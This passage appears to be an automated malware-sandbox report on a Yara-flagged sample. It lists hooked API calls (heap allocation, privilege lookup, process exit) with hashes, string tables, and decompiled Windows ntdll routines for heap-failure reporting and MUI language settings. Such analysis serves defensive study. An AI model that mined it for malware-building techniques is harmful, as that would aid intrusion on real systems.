                                                                                  • Instruction ID: 6e3ac9954d8d29650c776292fecb8b307ae06c9433fb47b70263ec1676c06812
                                                                                  • Opcode Fuzzy Hash: d57d74175e6019994fd9ba53c3da2f56edbd5a6daf1530240949727d58b914cb
                                                                                  • Instruction Fuzzy Hash: 31F090B5200208AFDB14DF65EC44EEB779DEF85724F05819EFA4C6B252CA35E8448BB4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                  • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                  • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                  • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                  • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                  • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                  • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                  • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                  • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4109faa40e4a6c0ed56de0bf25d0e0c500724929c127db4c2aa83f1b091748c8
                                                                                  • Instruction ID: cb0725caf308b0b1fee4c142bec3f94c554a4eb8b1fd50ee3b63d22b2d7062b5
                                                                                  • Opcode Fuzzy Hash: 4109faa40e4a6c0ed56de0bf25d0e0c500724929c127db4c2aa83f1b091748c8
                                                                                  • Instruction Fuzzy Hash: 6BB09B719054C9C5D711D7614A087277D4577D0745F17D062D2021641B477CC4D1F5B5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Strings
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 00F5B352
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00F5B2DC
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00F5B484
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00F5B323
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00F5B38F
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00F5B47D
                                                                                  • The critical section is owned by thread %p., xrefs: 00F5B3B9
                                                                                  • *** enter .exr %p for the exception record, xrefs: 00F5B4F1
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00F5B305
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00F5B314
                                                                                  • The instruction at %p tried to %s , xrefs: 00F5B4B6
                                                                                  • *** then kb to get the faulting stack, xrefs: 00F5B51C
                                                                                  • The resource is owned shared by %d threads, xrefs: 00F5B37E
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00F5B3D6
                                                                                  • write to, xrefs: 00F5B4A6
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00F5B53F
                                                                                  • This failed because of error %Ix., xrefs: 00F5B446
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 00F5B432
                                                                                  • a NULL pointer, xrefs: 00F5B4E0
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00F5B2F3
                                                                                  • read from, xrefs: 00F5B4AD, 00F5B4B2
                                                                                  • *** enter .cxr %p for the context, xrefs: 00F5B50D
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 00F5B48F
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 00F5B3C5
                                                                                  • <unknown>, xrefs: 00F5B27E, 00F5B2D1, 00F5B350, 00F5B399, 00F5B417, 00F5B48E
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 00F5B374
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00F5B39B
                                                                                  • an invalid address, %p, xrefs: 00F5B4CF
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00F5B476
                                                                                  • *** Inpage error in %ws:%s, xrefs: 00F5B418
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  • Opcode ID: 4d50b900d4d7e2e7c3da056ad89db929d1166cbc22856d0b5502f03927e2dba1
                                                                                  • Instruction ID: 63e551bb6c967bb33d04918371637c3c9fa003f78ab4fa159828896ba97b4284
                                                                                  • Opcode Fuzzy Hash: 4d50b900d4d7e2e7c3da056ad89db929d1166cbc22856d0b5502f03927e2dba1
                                                                                  • Instruction Fuzzy Hash: FA81E475A04610FFCF25AE058C46E7B3B26AF86B62F454044FA043B253D3658955F7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E00F61C06() {
                                                                                  				signed int _t27;
                                                                                  				char* _t104;
                                                                                  				char* _t105;
                                                                                  				intOrPtr _t113;
                                                                                  				intOrPtr _t115;
                                                                                  				intOrPtr _t117;
                                                                                  				intOrPtr _t119;
                                                                                  				intOrPtr _t120;
                                                                                  
                                                                                  				_t105 = 0xe848a4;
                                                                                  				_t104 = "HEAP: ";
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				_push( *0xf9589c);
                                                                                  				E00EAB150("Heap error detected at %p (heap handle %p)\n",  *0xf958a0);
                                                                                  				_t27 =  *0xf95898; // 0x0
                                                                                  				if(_t27 <= 0xf) {
                                                                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M00F61E96))) {
                                                                                  						case 0:
                                                                                  							_t105 = "heap_failure_internal";
                                                                                  							goto L21;
                                                                                  						case 1:
                                                                                  							goto L21;
                                                                                  						case 2:
                                                                                  							goto L21;
                                                                                  						case 3:
                                                                                  							goto L21;
                                                                                  						case 4:
                                                                                  							goto L21;
                                                                                  						case 5:
                                                                                  							goto L21;
                                                                                  						case 6:
                                                                                  							goto L21;
                                                                                  						case 7:
                                                                                  							goto L21;
                                                                                  						case 8:
                                                                                  							goto L21;
                                                                                  						case 9:
                                                                                  							goto L21;
                                                                                  						case 0xa:
                                                                                  							goto L21;
                                                                                  						case 0xb:
                                                                                  							goto L21;
                                                                                  						case 0xc:
                                                                                  							goto L21;
                                                                                  						case 0xd:
                                                                                  							goto L21;
                                                                                  						case 0xe:
                                                                                  							goto L21;
                                                                                  						case 0xf:
                                                                                  							goto L21;
                                                                                  					}
                                                                                  				}
                                                                                  				L21:
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				_push(_t105);
                                                                                  				E00EAB150("Error code: %d - %s\n",  *0xf95898);
                                                                                  				_t113 =  *0xf958a4; // 0x0
                                                                                  				if(_t113 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter1: %p\n",  *0xf958a4);
                                                                                  				}
                                                                                  				_t115 =  *0xf958a8; // 0x0
                                                                                  				if(_t115 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter2: %p\n",  *0xf958a8);
                                                                                  				}
                                                                                  				_t117 =  *0xf958ac; // 0x0
                                                                                  				if(_t117 != 0) {
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					E00EAB150("Parameter3: %p\n",  *0xf958ac);
                                                                                  				}
                                                                                  				_t119 =  *0xf958b0; // 0x0
                                                                                  				if(_t119 != 0) {
                                                                                  					L41:
                                                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  						_push(_t104);
                                                                                  						E00EAB150();
                                                                                  					} else {
                                                                                  						E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  					}
                                                                                  					_push( *0xf958b4);
                                                                                  					E00EAB150("Last known valid blocks: before - %p, after - %p\n",  *0xf958b0);
                                                                                  				} else {
                                                                                  					_t120 =  *0xf958b4; // 0x0
                                                                                  					if(_t120 != 0) {
                                                                                  						goto L41;
                                                                                  					}
                                                                                  				}
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                  					_push(_t104);
                                                                                  					E00EAB150();
                                                                                  				} else {
                                                                                  					E00EAB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                  				}
                                                                                  				return E00EAB150("Stack trace available at %p\n", 0xf958c0);
                                                                                  			}











                                                                                  0x00f61c10
                                                                                  0x00f61c16
                                                                                  0x00f61c1e
                                                                                  0x00f61c3d
                                                                                  0x00f61c3e
                                                                                  0x00f61c20
                                                                                  0x00f61c35
                                                                                  0x00f61c3a
                                                                                  0x00f61c44
                                                                                  0x00f61c55
                                                                                  0x00f61c5a
                                                                                  0x00f61c65
                                                                                  0x00f61c67
                                                                                  0x00000000
                                                                                  0x00f61c6e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f61c67
                                                                                  0x00f61cdc
                                                                                  0x00f61ce5
                                                                                  0x00f61d04
                                                                                  0x00f61d05
                                                                                  0x00f61ce7
                                                                                  0x00f61cfc
                                                                                  0x00f61d01
                                                                                  0x00f61d0b
                                                                                  0x00f61d17
                                                                                  0x00f61d1f
                                                                                  0x00f61d25
                                                                                  0x00f61d30
                                                                                  0x00f61d4f
                                                                                  0x00f61d50
                                                                                  0x00f61d32
                                                                                  0x00f61d47
                                                                                  0x00f61d4c
                                                                                  0x00f61d61
                                                                                  0x00f61d67
                                                                                  0x00f61d68
                                                                                  0x00f61d6e
                                                                                  0x00f61d79
                                                                                  0x00f61d98
                                                                                  0x00f61d99
                                                                                  0x00f61d7b
                                                                                  0x00f61d90
                                                                                  0x00f61d95
                                                                                  0x00f61daa
                                                                                  0x00f61db0
                                                                                  0x00f61db1
                                                                                  0x00f61db7
                                                                                  0x00f61dc2
                                                                                  0x00f61de1
                                                                                  0x00f61de2
                                                                                  0x00f61dc4
                                                                                  0x00f61dd9
                                                                                  0x00f61dde
                                                                                  0x00f61df3
                                                                                  0x00f61df9
                                                                                  0x00f61dfa
                                                                                  0x00f61e00
                                                                                  0x00f61e0a
                                                                                  0x00f61e13
                                                                                  0x00f61e32
                                                                                  0x00f61e33
                                                                                  0x00f61e15
                                                                                  0x00f61e2a
                                                                                  0x00f61e2f
                                                                                  0x00f61e39
                                                                                  0x00f61e4a
                                                                                  0x00f61e02
                                                                                  0x00f61e02
                                                                                  0x00f61e08
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f61e08
                                                                                  0x00f61e5b
                                                                                  0x00f61e7a
                                                                                  0x00f61e7b
                                                                                  0x00f61e5d
                                                                                  0x00f61e72
                                                                                  0x00f61e77
                                                                                  0x00f61e95

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                  • API String ID: 0-2897834094
                                                                                  • Opcode ID: b2c7b8fb5b4a50d12118a4c440c47ee3b34b7a73386e36a6d76d477af140da03
                                                                                  • Instruction ID: b8c741a9d8d7dbab1f0d47ae25301f7ac1690684b7fcb5213a6eb695cb6b5da3
                                                                                  • Opcode Fuzzy Hash: b2c7b8fb5b4a50d12118a4c440c47ee3b34b7a73386e36a6d76d477af140da03
                                                                                  • Instruction Fuzzy Hash: A1619033A52648DFC711EB84D896A2573E4FB18B31B1D917AF90D7F352D624AC40EB0A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 96%
                                                                                  			E00EB3D34(signed int* __ecx) {
                                                                                  				signed int* _v8;
                                                                                  				char _v12;
                                                                                  				signed int* _v16;
                                                                                  				signed int* _v20;
                                                                                  				char _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				char _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int* _v48;
                                                                                  				signed int* _v52;
                                                                                  				signed int _v56;
                                                                                  				signed int _v60;
                                                                                  				char _v68;
                                                                                  				signed int _t140;
                                                                                  				signed int _t161;
                                                                                  				signed int* _t236;
                                                                                  				signed int* _t242;
                                                                                  				signed int* _t243;
                                                                                  				signed int* _t244;
                                                                                  				signed int* _t245;
                                                                                  				signed int _t255;
                                                                                  				void* _t257;
                                                                                  				signed int _t260;
                                                                                  				void* _t262;
                                                                                  				signed int _t264;
                                                                                  				void* _t267;
                                                                                  				signed int _t275;
                                                                                  				signed int* _t276;
                                                                                  				short* _t277;
                                                                                  				signed int* _t278;
                                                                                  				signed int* _t279;
                                                                                  				signed int* _t280;
                                                                                  				short* _t281;
                                                                                  				signed int* _t282;
                                                                                  				short* _t283;
                                                                                  				signed int* _t284;
                                                                                  				void* _t285;
                                                                                  
                                                                                  				_v60 = _v60 | 0xffffffff;
                                                                                  				_t280 = 0;
                                                                                  				_t242 = __ecx;
                                                                                  				_v52 = __ecx;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v44 = 0;
                                                                                  				_v56 = 0;
                                                                                  				_t275 = 0;
                                                                                  				_v16 = 0;
                                                                                  				if(__ecx == 0) {
                                                                                  					_t280 = 0xc000000d;
                                                                                  					_t140 = 0;
                                                                                  					L50:
                                                                                  					 *_t242 =  *_t242 | 0x00000800;
                                                                                  					_t242[0x13] = _t140;
                                                                                  					_t242[0x16] = _v40;
                                                                                  					_t242[0x18] = _v28;
                                                                                  					_t242[0x14] = _v32;
                                                                                  					_t242[0x17] = _t275;
                                                                                  					_t242[0x15] = _v44;
                                                                                  					_t242[0x11] = _v56;
                                                                                  					_t242[0x12] = _v60;
                                                                                  					return _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                  					_v56 = 1;
                                                                                  					if(_v8 != 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                  					}
                                                                                  					_v8 = _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                  					_v60 =  *_v8;
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                  					_v8 = _t280;
                                                                                  				}
                                                                                  				if(E00EB1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  					L16:
                                                                                  					if(E00EB1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  						L28:
                                                                                  						if(E00EB1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                  							L46:
                                                                                  							_t275 = _v16;
                                                                                  							L47:
                                                                                  							_t161 = 0;
                                                                                  							L48:
                                                                                  							if(_v8 != 0) {
                                                                                  								L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                  							}
                                                                                  							_t140 = _v20;
                                                                                  							if(_t140 != 0) {
                                                                                  								if(_t275 != 0) {
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                  									_t275 = 0;
                                                                                  									_v28 = 0;
                                                                                  									_t140 = _v20;
                                                                                  								}
                                                                                  							}
                                                                                  							goto L50;
                                                                                  						}
                                                                                  						_t167 = _v12;
                                                                                  						_t255 = _v12 + 4;
                                                                                  						_v44 = _t255;
                                                                                  						if(_t255 == 0) {
                                                                                  							_t276 = _t280;
                                                                                  							_v32 = _t280;
                                                                                  						} else {
                                                                                  							_t276 = L00EC4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                  							_t167 = _v12;
                                                                                  							_v32 = _t276;
                                                                                  						}
                                                                                  						if(_t276 == 0) {
                                                                                  							_v44 = _t280;
                                                                                  							_t280 = 0xc0000017;
                                                                                  							goto L46;
                                                                                  						} else {
                                                                                  							E00EEF3E0(_t276, _v8, _t167);
                                                                                  							_v48 = _t276;
                                                                                  							_t277 = E00EF1370(_t276, 0xe84e90);
                                                                                  							_pop(_t257);
                                                                                  							if(_t277 == 0) {
                                                                                  								L38:
                                                                                  								_t170 = _v48;
                                                                                  								if( *_v48 != 0) {
                                                                                  									E00EEBB40(0,  &_v68, _t170);
                                                                                  									if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  										_t280 =  &(_t280[0]);
                                                                                  									}
                                                                                  								}
                                                                                  								if(_t280 == 0) {
                                                                                  									_t280 = 0;
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                  									_v44 = 0;
                                                                                  									_v32 = 0;
                                                                                  								} else {
                                                                                  									_t280 = 0;
                                                                                  								}
                                                                                  								_t174 = _v8;
                                                                                  								if(_v8 != 0) {
                                                                                  									L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                  								}
                                                                                  								_v8 = _t280;
                                                                                  								goto L46;
                                                                                  							}
                                                                                  							_t243 = _v48;
                                                                                  							do {
                                                                                  								 *_t277 = 0;
                                                                                  								_t278 = _t277 + 2;
                                                                                  								E00EEBB40(_t257,  &_v68, _t243);
                                                                                  								if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  									_t280 =  &(_t280[0]);
                                                                                  								}
                                                                                  								_t243 = _t278;
                                                                                  								_t277 = E00EF1370(_t278, 0xe84e90);
                                                                                  								_pop(_t257);
                                                                                  							} while (_t277 != 0);
                                                                                  							_v48 = _t243;
                                                                                  							_t242 = _v52;
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					_t191 = _v12;
                                                                                  					_t260 = _v12 + 4;
                                                                                  					_v28 = _t260;
                                                                                  					if(_t260 == 0) {
                                                                                  						_t275 = _t280;
                                                                                  						_v16 = _t280;
                                                                                  					} else {
                                                                                  						_t275 = L00EC4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                  						_t191 = _v12;
                                                                                  						_v16 = _t275;
                                                                                  					}
                                                                                  					if(_t275 == 0) {
                                                                                  						_v28 = _t280;
                                                                                  						_t280 = 0xc0000017;
                                                                                  						goto L47;
                                                                                  					} else {
                                                                                  						E00EEF3E0(_t275, _v8, _t191);
                                                                                  						_t285 = _t285 + 0xc;
                                                                                  						_v48 = _t275;
                                                                                  						_t279 = _t280;
                                                                                  						_t281 = E00EF1370(_v16, 0xe84e90);
                                                                                  						_pop(_t262);
                                                                                  						if(_t281 != 0) {
                                                                                  							_t244 = _v48;
                                                                                  							do {
                                                                                  								 *_t281 = 0;
                                                                                  								_t282 = _t281 + 2;
                                                                                  								E00EEBB40(_t262,  &_v68, _t244);
                                                                                  								if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  									_t279 =  &(_t279[0]);
                                                                                  								}
                                                                                  								_t244 = _t282;
                                                                                  								_t281 = E00EF1370(_t282, 0xe84e90);
                                                                                  								_pop(_t262);
                                                                                  							} while (_t281 != 0);
                                                                                  							_v48 = _t244;
                                                                                  							_t242 = _v52;
                                                                                  						}
                                                                                  						_t201 = _v48;
                                                                                  						_t280 = 0;
                                                                                  						if( *_v48 != 0) {
                                                                                  							E00EEBB40(_t262,  &_v68, _t201);
                                                                                  							if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  								_t279 =  &(_t279[0]);
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t279 == 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                  							_v28 = _t280;
                                                                                  							_v16 = _t280;
                                                                                  						}
                                                                                  						_t202 = _v8;
                                                                                  						if(_v8 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                  						}
                                                                                  						_v8 = _t280;
                                                                                  						goto L28;
                                                                                  					}
                                                                                  				}
                                                                                  				_t214 = _v12;
                                                                                  				_t264 = _v12 + 4;
                                                                                  				_v40 = _t264;
                                                                                  				if(_t264 == 0) {
                                                                                  					_v20 = _t280;
                                                                                  				} else {
                                                                                  					_t236 = L00EC4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                  					_t280 = _t236;
                                                                                  					_v20 = _t236;
                                                                                  					_t214 = _v12;
                                                                                  				}
                                                                                  				if(_t280 == 0) {
                                                                                  					_t161 = 0;
                                                                                  					_t280 = 0xc0000017;
                                                                                  					_v40 = 0;
                                                                                  					goto L48;
                                                                                  				} else {
                                                                                  					E00EEF3E0(_t280, _v8, _t214);
                                                                                  					_t285 = _t285 + 0xc;
                                                                                  					_v48 = _t280;
                                                                                  					_t283 = E00EF1370(_t280, 0xe84e90);
                                                                                  					_pop(_t267);
                                                                                  					if(_t283 != 0) {
                                                                                  						_t245 = _v48;
                                                                                  						do {
                                                                                  							 *_t283 = 0;
                                                                                  							_t284 = _t283 + 2;
                                                                                  							E00EEBB40(_t267,  &_v68, _t245);
                                                                                  							if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  								_t275 = _t275 + 1;
                                                                                  							}
                                                                                  							_t245 = _t284;
                                                                                  							_t283 = E00EF1370(_t284, 0xe84e90);
                                                                                  							_pop(_t267);
                                                                                  						} while (_t283 != 0);
                                                                                  						_v48 = _t245;
                                                                                  						_t242 = _v52;
                                                                                  					}
                                                                                  					_t224 = _v48;
                                                                                  					_t280 = 0;
                                                                                  					if( *_v48 != 0) {
                                                                                  						E00EEBB40(_t267,  &_v68, _t224);
                                                                                  						if(L00EB43C0( &_v68,  &_v24) != 0) {
                                                                                  							_t275 = _t275 + 1;
